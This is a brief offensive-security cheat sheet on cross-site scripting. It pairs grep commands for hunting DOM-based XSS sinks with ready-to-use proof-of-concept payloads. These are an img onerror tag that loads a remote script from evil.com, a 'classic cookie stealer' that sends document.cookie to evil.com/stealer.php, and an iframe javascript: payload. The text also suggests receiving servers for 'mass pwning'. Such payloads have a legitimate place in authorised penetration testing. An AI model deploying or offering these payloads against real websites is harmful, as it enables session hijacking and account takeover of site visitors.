
# XSS Tips


## DOM Based

  • Hunting (do this in the folder holding the downloaded JS)
    • Simple document.write search (include the JS files as well as the HTML):

      ```shell
      grep -r "document.write" ./ --include "*.html" --include "*.js"
      ```

    • If the user input is a variable from another JS file, search for the variable with <VARIABLE>
      • note: there could be a space between the variable being assigned and the '=' sign, so match zero or more spaces

        ```shell
        grep -ER "<VARIABLE>[ ]*=" ./
        ```

## Quick PoC Payloads

  • img tag to CSRF

    ```html
    <img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />
    ```

  • Classic cookie stealer
    • You may set up receiving servers, APIs, or webhooks for mass pwning

      ```html
      <img src=a onerror="location.href='https://evil.com/stealer.php?cookie='+document.cookie;">
      ```

  • iFrame

    ```html
    <iframe src="javascript:alert(1)"></iframe>
    ```

Last update: February 22, 2022